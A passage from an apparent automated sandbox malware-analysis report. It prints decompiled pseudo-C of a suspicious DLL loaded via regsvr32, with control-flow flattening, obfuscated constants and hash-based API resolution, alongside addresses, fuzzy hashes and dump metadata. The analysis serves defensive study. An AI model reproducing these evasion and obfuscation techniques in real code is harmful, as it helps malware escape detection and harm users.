				_v1044 = 0x280a2d;
				_t397 = 0x1b;
				_v1044 = _v1044 / _t397;
				_v1044 = _v1044 ^ 0x00026c41;
				_v1112 = 0xf4f8ad;
				_v1112 = _v1112 | 0x31020989;
				_v1112 = _v1112 ^ 0xb2119b1d;
				_v1112 = _v1112 ^ 0x83e5369c;
				_v1072 = 0x8cce38;
				_v1072 = _v1072 + 0xffff33e2;
				_v1072 = _v1072 ^ 0x0080f045;
				_v1140 = 0x24ced0;
				_v1140 = _v1140 << 2;
				_v1140 = _v1140 << 0x10;
				_v1140 = _v1140 ^ 0x3b49e0cc;
				_v1084 = 0x951ecf;
				_v1084 = _v1084 + 0xffff9d48;
				_v1084 = _v1084 ^ 0x0091f163;
				_v1192 = 0xdd5982;
				_v1192 = _v1192 + 0xffff8df7;
				_v1192 = _v1192 >> 2;
				_v1192 = _v1192 + 0x9e8c;
				_v1192 = _v1192 ^ 0x0034c44f;
				_v1156 = 0x8a9eab;
				_v1156 = _v1156 ^ 0xf789fa2b;
				_t398 = 0x61;
				_v1156 = _v1156 * 0x3e;
				_v1156 = _v1156 << 6;
				_v1156 = _v1156 ^ 0xb4986f10;
				_v1176 = 0x7544e0;
				_v1176 = _v1176 * 0x1b;
				_v1176 = _v1176 << 3;
				_v1176 = _v1176 + 0xffff4759;
				_v1176 = _v1176 ^ 0x62ff5959;
				_v1100 = 0xeb6fb9;
				_v1100 = _v1100 + 0xc064;
				_v1100 = _v1100 / _t398;
				_v1100 = _v1100 ^ 0x00092ec4;
				_v1184 = 0x4c16a5;
				_v1184 = _v1184 + 0x6404;
				_v1184 = _v1184 + 0xeb8d;
				_v1184 = _v1184 << 3;
				_v1184 = _v1184 ^ 0x0263ec11;
				_v1108 = 0x24519c;
				_v1108 = _v1108 * 0x48;
				_v1108 = _v1108 >> 0xd;
				_v1108 = _v1108 ^ 0x0002808a;
				_v1116 = 0xd35e9c;
				_v1116 = _v1116 << 0x10;
				_v1116 = _v1116 | 0xff97a838;
				_v1116 = _v1116 ^ 0xff9f5da1;
				_v1124 = 0x87f849;
				_v1124 = _v1124 + 0xffff8a69;
				_v1124 = _v1124 >> 3;
				_v1124 = _v1124 ^ 0x001207a2;
				_v1132 = 0x780ad7;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 + 0xffffb1a2;
				_v1132 = _v1132 ^ 0xc05ace00;
				_v1068 = 0x12bd14;
				_v1068 = _v1068 ^ 0x86644583;
				_v1068 = _v1068 ^ 0x8678515a;
				_v1076 = 0xd8973b;
				_v1076 = _v1076 >> 0x10;
				_v1076 = _v1076 ^ 0x0004a471;
				_v1168 = 0x9dd678;
				_v1168 = _v1168 ^ 0x76a872b1;
				_v1168 = _v1168 + 0xcc62;
				_v1168 = _v1168 + 0xffffd5d8;
				_v1168 = _v1168 ^ 0x76323b8c;
				_v1144 = 0x32e41a;
				_v1144 = _v1144 | 0x5ea2a01f;
				_v1144 = _v1144 + 0xffff92b1;
				_v1144 = _v1144 * 0x4e;
				_v1144 = _v1144 ^ 0xda6ea878;
				_v1052 = 0xd249d9;
				_v1052 = _v1052 >> 6;
				_v1052 = _v1052 ^ 0x000dcab1;
				_v1092 = 0x4385d5;
				_v1092 = _v1092 ^ 0xef2253a7;
				_v1092 = _v1092 * 0x4b;
				_v1092 = _v1092 ^ 0x21a91e3c;
				_v1160 = 0xa425ec;
				_v1160 = _v1160 + 0xffff5cf8;
				_v1160 = _v1160 + 0x624;
				_v1160 = _v1160 >> 4;
				_v1160 = _v1160 ^ 0x00061a78;
				_v1060 = 0xe0ff2;
				_v1060 = _v1060 | 0x3919d48b;
				_v1060 = _v1060 ^ 0x3915dabc;
				do {
					while(_t366 != 0x4d2dd3e) {
						if(_t366 == 0x7d8f1b9) {
							E100166C2(_v1048,  &_v1040, _v1172, _v1104, _t366, _t366, _v1120, _v1064, _v1096, _v1128);
							_t403 =  &(_t403[8]);
							_t366 = 0xdf7c5bf;
							continue;
						} else {
							if(_t366 == 0xc65d38f) {
								_push(_v1060);
								_push(_v1160);
								_push(_v1092);
								_push(_t394);
								_push( &_v520);
								_push(_v1052);
								_push(_t394);
								_push(_v1152);
								__eflags = E100163F0(_v1144, 0, __eflags);
								_t394 =  !=  ? 1 : _t394;
							} else {
								_t410 = _t366 - 0xdf7c5bf;
								if(_t366 != 0xdf7c5bf) {
									goto L8;
								} else {
									_push(_v1188);
									_push(_v1088);
									_push(_v1164);
									_t358 = E10004BB4(0x10001230, _v1080);
									_t359 =  *0x10024208; // 0x49d848
									E10011BED(_v1180, _t410,  &_v1040,  &_v520, _t359 + 0x210, 0x10001230, _t358, _v1056, _v1136,  *0x10024208);
									E1000B9D7(_v1044, _v1112, _t358, _v1072);
									_t403 =  &(_t403[0xd]);
									_t366 = 0xc65d38f;
									continue;
								}
							}
						}
						L11:
						return _t394;
					}
					_push(_v1156);
					_push(_v1192);
					_push(_v1084);
					_t347 = E10004BB4(0x100012e0, _v1140);
					_t350 =  *0x10024208; // 0x49d848
					__eflags = _t350 + 0x210;
					E1000C453(_v1100, _v1184, _t394, _v1108, _v1116, _t350 + 0x210, _v1124,  &_v520,  *0x10024208, 0x104, _t347, _v1132,  &_v1040);
					E1000B9D7(_v1068, _v1076, _t347, _v1168);
					_t403 =  &(_t403[0x11]);
					_t366 = 0xc65d38f;
					L8:
					__eflags = _t366 - 0x9043080;
				} while (__eflags != 0);
				goto L11;
			}

0x1000c7db
0x1000c7e2
0x1000c7e4
0x1000c7e5
0x1000c7e6
0x1000c7eb
0x1000c7f3
0x1000c7f6
0x1000c800
0x1000c808
0x1000c80d
0x1000c815
0x1000c823
0x1000c828
0x1000c82e
0x1000c836
0x1000c83e
0x1000c846
0x1000c84e
0x1000c856
0x1000c85e
0x1000c871
0x1000c872
0x1000c879
0x1000c884
0x1000c88c
0x1000c891
0x1000c899
0x1000c8a1
0x1000c8a9
0x1000c8b4
0x1000c8bc
0x1000c8c7
0x1000c8cf
0x1000c8d7
0x1000c8df
0x1000c8e7
0x1000c8ef
0x1000c8fc
0x1000c900
0x1000c908
0x1000c913
0x1000c91e
0x1000c929
0x1000c936
0x1000c93a
0x1000c93f
0x1000c947
0x1000c94f
0x1000c957
0x1000c95f
0x1000c967
0x1000c96f
0x1000c977
0x1000c97f
0x1000c984
0x1000c98c
0x1000c994
0x1000c999
0x1000c9a1
0x1000c9a9
0x1000c9b1
0x1000c9b9
0x1000c9c6
0x1000c9d0
0x1000c9d4
0x1000c9de
0x1000c9e9
0x1000c9f1
0x1000c9fc
0x1000ca04
0x1000ca08
0x1000ca10
0x1000ca18
0x1000ca2c
0x1000ca31
0x1000ca3a
0x1000ca45
0x1000ca4d
0x1000ca55
0x1000ca5d
0x1000ca65
0x1000ca70
0x1000ca7b
0x1000ca86
0x1000ca8e
0x1000ca93
0x1000ca98
0x1000caa0
0x1000caab
0x1000cab6
0x1000cac1
0x1000cac9
0x1000cad1
0x1000cad6
0x1000cade
0x1000cae6
0x1000caee
0x1000cafb
0x1000cafc
0x1000cb00
0x1000cb05
0x1000cb0d
0x1000cb1a
0x1000cb1e
0x1000cb23
0x1000cb2b
0x1000cb33
0x1000cb3b
0x1000cb49
0x1000cb4d
0x1000cb55
0x1000cb5d
0x1000cb65
0x1000cb6d
0x1000cb72
0x1000cb7a
0x1000cb87
0x1000cb8b
0x1000cb90
0x1000cb98
0x1000cba0
0x1000cba5
0x1000cbad
0x1000cbb5
0x1000cbbd
0x1000cbc5
0x1000cbca
0x1000cbd2
0x1000cbda
0x1000cbdf
0x1000cbe7
0x1000cbef
0x1000cbfa
0x1000cc05
0x1000cc10
0x1000cc20
0x1000cc2d
0x1000cc38
0x1000cc40
0x1000cc48
0x1000cc50
0x1000cc58
0x1000cc60
0x1000cc68
0x1000cc70
0x1000cc7d
0x1000cc81
0x1000cc89
0x1000cc94
0x1000cc9c
0x1000cca7
0x1000ccaf
0x1000ccbc
0x1000ccc0
0x1000ccc8
0x1000ccd0
0x1000ccd8
0x1000cce0
0x1000cce5
0x1000cced
0x1000ccf8
0x1000cd03
0x1000cd0e
0x1000cd0e
0x1000cd20
0x1000cde6
0x1000cdeb
0x1000cdee
0x00000000
0x1000cd26
0x1000cd28
0x1000ce91
0x1000cea1
0x1000cea5
0x1000cea9
0x1000ceaa
0x1000ceab
0x1000ceb2
0x1000ceb3
0x1000cec6
0x1000cec8
0x1000cd2e
0x1000cd2e
0x1000cd30
0x00000000
0x1000cd36
0x1000cd36
0x1000cd3f
0x1000cd43
0x1000cd4e
0x1000cd69
0x1000cd8e
0x1000cda9
0x1000cdae
0x1000cdb1
0x00000000
0x1000cdb1
0x1000cd30
0x1000cd28
0x1000cecb
0x1000ced7
0x1000ced7
0x1000cdf5
0x1000cdfe
0x1000ce02
0x1000ce0d
0x1000ce38
0x1000ce3d
0x1000ce61
0x1000ce79
0x1000ce7e
0x1000ce81
0x1000ce83
0x1000ce83
0x1000ce83
0x00000000

Strings

B&S, xrefs: 1000C913
-(, xrefs: 1000CA18
Du, xrefs: 1000CB0D

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -($B&S$Du
API String ID: 0-1506186776
Opcode ID: cebb3445ca8f2b5379e12c4bf3febf00312e00f2e8f7f44435a8c30625d86fdf
Instruction ID: 8118cb69c56fd650f1a1a795b6c137f182e6769ee9972ef40b8d618b99ebf7d2
Opcode Fuzzy Hash: cebb3445ca8f2b5379e12c4bf3febf00312e00f2e8f7f44435a8c30625d86fdf
Instruction Fuzzy Hash: A0F1F1B11093809FE3A5CF25C58AA4BBBE1FBC5748F10891DF2DA96260C7B58949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10008C7C Relevance: 4.0, Strings: 3, Instructions: 231
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10008C7C() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				intOrPtr _t253;
				void* _t255;
				void* _t261;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int* _t298;

				_t298 =  &_v1152;
				_v1120 = 0x4b85f6;
				_v1120 = _v1120 | 0xdaea378f;
				_t261 = 0x4e0b416;
				_v1120 = _v1120 ^ 0xdaebb7ff;
				_v1116 = 0xa9adf9;
				_v1116 = _v1116 >> 6;
				_v1116 = _v1116 << 7;
				_v1116 = _v1116 ^ 0x01567b78;
				_v1124 = 0x48fcc0;
				_t291 = 0x27;
				_v1124 = _v1124 / _t291;
				_t292 = 0x59;
				_v1124 = _v1124 / _t292;
				_v1124 = _v1124 ^ 0x0008a29f;
				_v1136 = 0x9f0e00;
				_v1136 = _v1136 + 0x181e;
				_v1136 = _v1136 | 0x2d269d53;
				_v1136 = _v1136 ^ 0x2db3f9e4;
				_v1072 = 0x60cb7b;
				_t293 = 0x51;
				_v1072 = _v1072 / _t293;
				_v1072 = _v1072 ^ 0x00022fda;
				_v1056 = 0x353984;
				_v1056 = _v1056 + 0xffff6468;
				_v1056 = _v1056 ^ 0x003294d5;
				_v1080 = 0x14444e;
				_v1080 = _v1080 << 3;
				_v1080 = _v1080 ^ 0x00a42c8d;
				_v1108 = 0x7026ee;
				_v1108 = _v1108 ^ 0x792ea2f3;
				_v1108 = _v1108 ^ 0x082bfeb0;
				_v1108 = _v1108 ^ 0x7172a3e9;
				_v1092 = 0xb5a5bd;
				_v1092 = _v1092 >> 2;
				_v1092 = _v1092 ^ 0x002e4818;
				_v1152 = 0xa2cbab;
				_v1152 = _v1152 << 6;
				_v1152 = _v1152 + 0xffff08c4;
				_v1152 = _v1152 + 0xffff72a6;
				_v1152 = _v1152 ^ 0x28b00f97;
				_v1096 = 0x178642;
				_v1096 = _v1096 ^ 0xa7f28ef6;
				_v1096 = _v1096 ^ 0xa7e57d32;
				_v1132 = 0x1c1a6a;
				_v1132 = _v1132 << 9;
				_v1132 = _v1132 + 0xf1d1;
				_v1132 = _v1132 ^ 0x38306aa9;
				_v1044 = 0x863fd9;
				_v1044 = _v1044 + 0xd93f;
				_v1044 = _v1044 ^ 0x0089939f;
				_v1140 = 0x78b577;
				_v1140 = _v1140 + 0xffff5571;
				_v1140 = _v1140 >> 6;
				_v1140 = _v1140 + 0xa71d;
				_v1140 = _v1140 ^ 0x00036b74;
				_v1084 = 0x2ab8fa;
				_v1084 = _v1084 >> 4;
				_v1084 = _v1084 ^ 0x000819d3;
				_v1148 = 0x3ebee2;
				_v1148 = _v1148 + 0xffff9e0b;
				_v1148 = _v1148 * 0x74;
				_v1148 = _v1148 ^ 0xfcb6bf6f;
				_v1148 = _v1148 ^ 0xe0f86788;
				_v1144 = 0xfb2228;
				_v1144 = _v1144 + 0x6163;
				_v1144 = _v1144 >> 0xd;
				_v1144 = _v1144 + 0xfffff65f;
				_v1144 = _v1144 ^ 0xfffe25ad;
				_v1064 = 0x77bc21;
				_t294 = 0x66;
				_v1064 = _v1064 * 0x28;
				_v1064 = _v1064 ^ 0x12bf1d10;
				_v1048 = 0xd6a1be;
				_v1048 = _v1048 << 0xd;
				_v1048 = _v1048 ^ 0xd431fd34;
				_v1088 = 0xa7ceaf;
				_v1088 = _v1088 | 0x23dbe2cf;
				_v1088 = _v1088 ^ 0x23fcd478;
				_v1100 = 0xffafd8;
				_v1100 = _v1100 + 0xffff09ef;
				_v1100 = _v1100 ^ 0x00f1f635;
				_v1128 = 0x1dcfcb;
				_v1128 = _v1128 / _t294;
				_t295 = 0x22;
				_v1128 = _v1128 / _t295;
				_v1128 = _v1128 ^ 0x0004722e;
				_v1068 = 0xfb71f;
				_v1068 = _v1068 + 0x39c6;
				_v1068 = _v1068 ^ 0x000b98bc;
				_v1076 = 0xc00f6d;
				_v1076 = _v1076 * 6;
				_v1076 = _v1076 ^ 0x048b4c90;
				_v1104 = 0x246476;
				_v1104 = _v1104 + 0x2ca;
				_v1104 = _v1104 ^ 0x93a77155;
				_v1104 = _v1104 ^ 0x9381e107;
				_v1052 = 0xb5a8cb;
				_v1052 = _v1052 + 0xffffd274;
				_v1052 = _v1052 ^ 0x00b4b2cd;
				_v1060 = 0xc9ba14;
				_v1060 = _v1060 + 0x6ca0;
				_v1060 = _v1060 ^ 0x00cf3cf6;
				_v1112 = 0x73055c;
				_v1112 = _v1112 | 0xff7fbfc0;
				_v1112 = _v1112 ^ 0xff7ce535;
				while(_t261 != 0xf510b0) {
					if(_t261 == 0x1bfe984) {
						E10009133();
						L8:
						_t261 = 0xf510b0;
						continue;
					}
					if(_t261 == 0x4ccfeca) {
						E1000D899(_v1144, _v1064,  &_v520);
						E1002110E(_v1048, _v1088, __eflags, _v1100,  &_v520,  &_v1040);
						_t298 =  &(_t298[4]);
						_t261 = 0x8347710;
						continue;
					}
					if(_t261 == 0x4e0b416) {
						_t253 =  *0x10024208; // 0x49d848
						__eflags =  *((intOrPtr*)(_t253 + 0x420));
						_t261 =  !=  ? 0x9d578fc : 0x1bfe984;
						continue;
					}
					if(_t261 == 0x8347710) {
						_t255 = E1000FFDE(_v1128, _v1068,  &_v1040, _v1076);
						__eflags = 0;
						 *((short*)(_t255 + _v1120 * 2)) = 0;
						return E1000F6CF(_v1104, _v1052, _v1060, _v1112,  &_v1040);
					}
					if(_t261 != 0x9d578fc) {
						L13:
						__eflags = _t261 - 0x76a5c32;
						if(_t261 != 0x76a5c32) {
							continue;
						}
						return _t253;
					}
					_t253 = E1000B4FC();
					goto L8;
				}
				_push(_v1108);
				_push(_v1080);
				_push(_v1056);
				E1001734A(_v1092, __eflags, _v1152, _v1096, _v1132,  &_v1040, E10004BB4(0x10001200, _v1072), _v1044, 0x10001200,  *0x10024208);
				E1000B9D7(_v1140, _v1084, _t242, _v1148);
				_t298 =  &(_t298[0xd]);
				_t261 = 0x4ccfeca;
				goto L13;
			}

0x10008c7c
0x10008c82
0x10008c8c
0x10008c94
0x10008c99
0x10008ca1
0x10008ca9
0x10008cae
0x10008cb3
0x10008cbb
0x10008ccd
0x10008cd2
0x10008cdc
0x10008ce1
0x10008ce7
0x10008cef
0x10008cf7
0x10008cff
0x10008d07
0x10008d0f
0x10008d1b
0x10008d1e
0x10008d22
0x10008d2a
0x10008d32
0x10008d3a
0x10008d42
0x10008d4a
0x10008d4f
0x10008d57
0x10008d5f
0x10008d67
0x10008d6f
0x10008d77
0x10008d7f
0x10008d84
0x10008d8c
0x10008d94
0x10008d99
0x10008da1
0x10008da9
0x10008db1
0x10008db9
0x10008dc1
0x10008dc9
0x10008dd1
0x10008dd6
0x10008dde
0x10008de6
0x10008dee
0x10008df6
0x10008dfe
0x10008e06
0x10008e0e
0x10008e13
0x10008e1b
0x10008e23
0x10008e2b
0x10008e30
0x10008e38
0x10008e40
0x10008e4d
0x10008e51
0x10008e59
0x10008e61
0x10008e69
0x10008e73
0x10008e7d
0x10008e8a
0x10008e97
0x10008ea6
0x10008ea9
0x10008ead
0x10008eb5
0x10008ebd
0x10008ec2
0x10008eca
0x10008ed2
0x10008eda
0x10008ee2
0x10008eea
0x10008ef2
0x10008efa
0x10008f0a
0x10008f12
0x10008f15
0x10008f19
0x10008f21
0x10008f29
0x10008f31
0x10008f39
0x10008f46
0x10008f4a
0x10008f52
0x10008f5a
0x10008f62
0x10008f6a
0x10008f72
0x10008f7a
0x10008f82
0x10008f8a
0x10008f92
0x10008f9a
0x10008fa2
0x10008faa
0x10008fb2
0x10008fba
0x10008fc4
0x1000905c
0x10008ffb
0x10008ffb
0x00000000
0x10008ffb
0x10008fd0
0x10009022
0x10009046
0x1000904b
0x1000904e
0x00000000
0x1000904e
0x10008fd8
0x10008fff
0x10009006
0x1000900d
0x00000000
0x1000900d
0x10008fe0
0x100090f6
0x100090ff
0x10009101
0x00000000
0x10009125
0x10008fe8
0x100090d4
0x100090d4
0x100090da
0x00000000
0x00000000
0x00000000
0x100090da
0x10008ff6
0x00000000
0x10008ff6
0x10009063
0x1000906c
0x10009070
0x100090b5
0x100090c7
0x100090cc
0x100090cf
0x00000000

Strings

&p, xrefs: 10008D57
vd$, xrefs: 10008F52
ca, xrefs: 10008E69

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ca$vd$$&p
API String ID: 0-854216173
Opcode ID: 97c57eec261c12df8a67c527beb1ce080d1137ed8914ed7f52672e1f532cd27d
Instruction ID: 515fd6f7896770a2c01a9e54e8178091655dc16062c2e754ed51a64660e60a33
Opcode Fuzzy Hash: 97c57eec261c12df8a67c527beb1ce080d1137ed8914ed7f52672e1f532cd27d
Instruction Fuzzy Hash: 5BC131B15093419FD364CF25C58955FFBE2FBC4748F108A1DF6A696260D7B08A09CF82

Uniqueness

Uniqueness Score: -1.00%

Function 100227DF Relevance: 4.0, Strings: 3, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E100227DF(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				unsigned int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				void* _t183;
				void* _t196;
				signed int _t201;
				intOrPtr* _t202;
				void* _t210;
				void* _t211;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				void* _t228;
				void* _t232;
				signed int* _t233;
				signed int* _t234;

				_t202 = __ecx;
				_t233 =  &_v224;
				_v160 = __ecx;
				_v136 = _v136 & 0x00000000;
				_v132 = _v132 & 0x00000000;
				_v144 = 0x470562;
				_v140 = 0x1a3ed0;
				_v152 = 0x240109;
				_t225 = 0x59;
				_v152 = _v152 / _t225;
				_v152 = _v152 ^ 0x00006ff0;
				_t228 = 0x662bcd4;
				_v188 = 0x4da749;
				_v188 = _v188 + 0xffffe3db;
				_v188 = _v188 + 0x8682;
				_v188 = _v188 ^ 0x004bc409;
				_v168 = 0xcafac6;
				_v168 = _v168 >> 9;
				_v168 = _v168 >> 0xe;
				_v168 = _v168 ^ 0x000366ff;
				_v148 = 0x394b3f;
				_v148 = _v148 ^ 0x6154ac94;
				_v148 = _v148 ^ 0x616102dd;
				_v224 = 0x399d0e;
				_t226 = 0x22;
				_v224 = _v224 * 0x47;
				_v224 = _v224 << 0x10;
				_v224 = _v224 + 0x5ef3;
				_v224 = _v224 ^ 0x8ee18615;
				_v172 = 0x1ce8b6;
				_v172 = _v172 >> 0xf;
				_v172 = _v172 + 0xed34;
				_v172 = _v172 ^ 0x00022c80;
				_v184 = 0xdac681;
				_v184 = _v184 / _t226;
				_v184 = _v184 << 2;
				_v184 = _v184 ^ 0x001cfcad;
				_v192 = 0xa09689;
				_v192 = _v192 * 0x64;
				_v192 = _v192 >> 5;
				_v192 = _v192 ^ 0x01fd4eb7;
				_v208 = 0xee7918;
				_v208 = _v208 * 0x1f;
				_v208 = _v208 + 0x818;
				_v208 = _v208 ^ 0x1cedd527;
				_v220 = 0xad7ed7;
				_v220 = _v220 ^ 0xedfc51c6;
				_v220 = _v220 >> 0xc;
				_v220 = _v220 | 0xb4e0e2d3;
				_v220 = _v220 ^ 0xb4ebd633;
				_v156 = 0xa09480;
				_v156 = _v156 + 0x313f;
				_v156 = _v156 ^ 0x00a3988d;
				_v180 = 0x766fbf;
				_v180 = _v180 << 1;
				_v180 = _v180 | 0x97ef3c98;
				_v180 = _v180 ^ 0x97e2e06c;
				_v196 = 0xc50b91;
				_v196 = _v196 >> 0xb;
				_v196 = _v196 + 0xffffc4ce;
				_v196 = _v196 ^ 0xfffb856f;
				_v164 = 0x878fb4;
				_v164 = _v164 * 0x38;
				_v164 = _v164 ^ 0x1da27320;
				_v176 = 0xe9387;
				_v176 = _v176 >> 3;
				_v176 = _v176 | 0x274dc8e4;
				_v176 = _v176 ^ 0x2744d04e;
				_v200 = 0xd55198;
				_v200 = _v200 ^ 0x80356ee8;
				_v200 = _v200 + 0xffff5bad;
				_v200 = _v200 ^ 0x80dce992;
				_v216 = 0x20f6d0;
				_v216 = _v216 >> 4;
				_v216 = _v216 + 0xfffffdb8;
				_v216 = _v216 >> 0xc;
				_v216 = _v216 ^ 0x0001ff1d;
				_v212 = 0xbb5d9e;
				_v212 = _v212 ^ 0x7c14b7bb;
				_v212 = _v212 ^ 0x7ca2db47;
				_t227 = _v212;
				_t201 = _v212;
				_v204 = 0xcd0ef2;
				_v204 = _v204 ^ 0x1209f5a0;
				_v204 = _v204 + 0xffffcc4a;
				_v204 = _v204 ^ 0x12cb2c57;
				while(1) {
					L1:
					do {
						while(_t228 != 0x63614ff) {
							if(_t228 == 0x662bcd4) {
								_t228 = 0xd3f2597;
								continue;
							} else {
								if(_t228 == 0xb6fc35a) {
									_t232 = 0x4000;
									_push(_t202);
									_t201 = E1001EAA3(0x4000);
									_t183 = 0xeda6358;
									_t202 = _v160;
									_t228 =  !=  ? 0xeda6358 : 0xc04a6b7;
									continue;
								} else {
									if(_t228 == 0xc04a6b7) {
										E10006A8D(_v212, _v204, _t227);
									} else {
										if(_t228 == 0xd3f2597) {
											_push(1);
											_t234 = _t233 - 0xc;
											_t210 = 0x10;
											_t232 = E1000D763(_t210);
											_push(_t232);
											_push(_v172);
											_push( &_v128);
											_t211 = 0xb;
											E1001DF4E(_t211, _v224);
											_t228 = 0x63614ff;
											goto L9;
										} else {
											if(_t228 != _t183) {
												goto L17;
											} else {
												_push(_v164);
												_push(_v196);
												_push(_v180);
												_t196 = E10004BB4(0x100010e4, _v156);
												_t234 =  &(_t233[3]);
												_push(_t227);
												_push( &_v128);
												_push(_t196);
												_push(_t232);
												_push(_t201);
												 *((intOrPtr*)(E1000F56B(0xb32137d5, 0x1a3)))();
												E1000B9D7(_v176, _v200, _t196, _v216);
												_t228 = 0xc04a6b7;
												L9:
												_t233 =  &(_t234[7]);
												L10:
												_t202 = _v160;
												goto L1;
											}
										}
									}
								}
							}
							L20:
							return _t201;
						}
						_t227 = E100151E8(_v184, _v192,  *_t202,  *((intOrPtr*)(_t202 + 4)));
						if(_t227 == 0) {
							_t202 = _v160;
							_t228 = 0xbb87790;
							_t183 = 0xeda6358;
							goto L17;
						} else {
							_t228 = 0xb6fc35a;
							goto L10;
						}
						goto L20;
						L17:
					} while (_t228 != 0xbb87790);
					goto L20;
				}
			}

0x100227df
0x100227df
0x100227e9
0x100227ed
0x100227f4
0x100227f9
0x10022801
0x10022809
0x10022817
0x1002281c
0x10022822
0x1002282a
0x1002282f
0x10022837
0x1002283f
0x10022847
0x1002284f
0x10022857
0x1002285c
0x10022861
0x10022869
0x10022871
0x10022879
0x10022881
0x1002288e
0x1002288f
0x10022893
0x10022898
0x100228a0
0x100228a8
0x100228b0
0x100228b5
0x100228bd
0x100228c5
0x100228d3
0x100228d7
0x100228dc
0x100228e4
0x100228f1
0x100228f5
0x100228fa
0x10022902
0x1002290f
0x10022913
0x1002291b
0x10022923
0x1002292b
0x10022933
0x10022938
0x10022940
0x10022948
0x10022950
0x10022958
0x10022960
0x10022968
0x1002296c
0x10022974
0x1002297c
0x10022984
0x10022989
0x10022991
0x10022999
0x100229a6
0x100229aa
0x100229b2
0x100229ba
0x100229bf
0x100229c7
0x100229cf
0x100229d7
0x100229df
0x100229e7
0x100229ef
0x100229f7
0x100229fc
0x10022a04
0x10022a09
0x10022a11
0x10022a19
0x10022a21
0x10022a2d
0x10022a31
0x10022a35
0x10022a3d
0x10022a45
0x10022a4d
0x10022a55
0x10022a55
0x10022a5a
0x10022a5a
0x10022a6c
0x10022b66
0x00000000
0x10022a72
0x10022a78
0x10022b3a
0x10022b43
0x10022b4b
0x10022b54
0x10022b5a
0x10022b5e
0x00000000
0x10022a7e
0x10022a84
0x10022bb9
0x10022a8a
0x10022a90
0x10022b07
0x10022b09
0x10022b0e
0x10022b14
0x10022b1d
0x10022b1e
0x10022b26
0x10022b29
0x10022b2a
0x10022b2f
0x00000000
0x10022a92
0x10022a94
0x00000000
0x10022a9a
0x10022a9a
0x10022aa3
0x10022aa7
0x10022aaf
0x10022ab4
0x10022ac2
0x10022ac3
0x10022ac4
0x10022ac5
0x10022ac6
0x10022ad2
0x10022ae1
0x10022ae6
0x10022aeb
0x10022aeb
0x10022aee
0x10022aee
0x00000000
0x10022aee
0x10022a94
0x10022a90
0x10022a84
0x10022a78
0x10022bc2
0x10022bcb
0x10022bcb
0x10022b82
0x10022b88
0x10022b94
0x10022b98
0x10022b9d
0x00000000
0x10022b8a
0x10022b8a
0x00000000
0x10022b8a
0x00000000
0x10022ba2
0x10022ba2
0x00000000
0x10022bae

Strings

4, xrefs: 100228B5
?1, xrefs: 10022950
?K9, xrefs: 10022869

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4$?1$?K9
API String ID: 0-4051938935
Opcode ID: 92053ab0a79aec4f87abccc548b16afa327026f5f17885883c89a30f50a91c0e
Instruction ID: 7a97b7420d7c710c03dbf1b0191b10faa7a01c86007c2339a678e98d9cc83f3e
Opcode Fuzzy Hash: 92053ab0a79aec4f87abccc548b16afa327026f5f17885883c89a30f50a91c0e
Instruction Fuzzy Hash: 55A13176508381AFC354CE65D48A90BFBE0FBC4758F50892DFA9696260C7B5CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 100072CC Relevance: 3.9, Strings: 3, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E100072CC(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				char _v604;
				intOrPtr _t194;
				void* _t197;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;

				_v40 = 0xe56e1d;
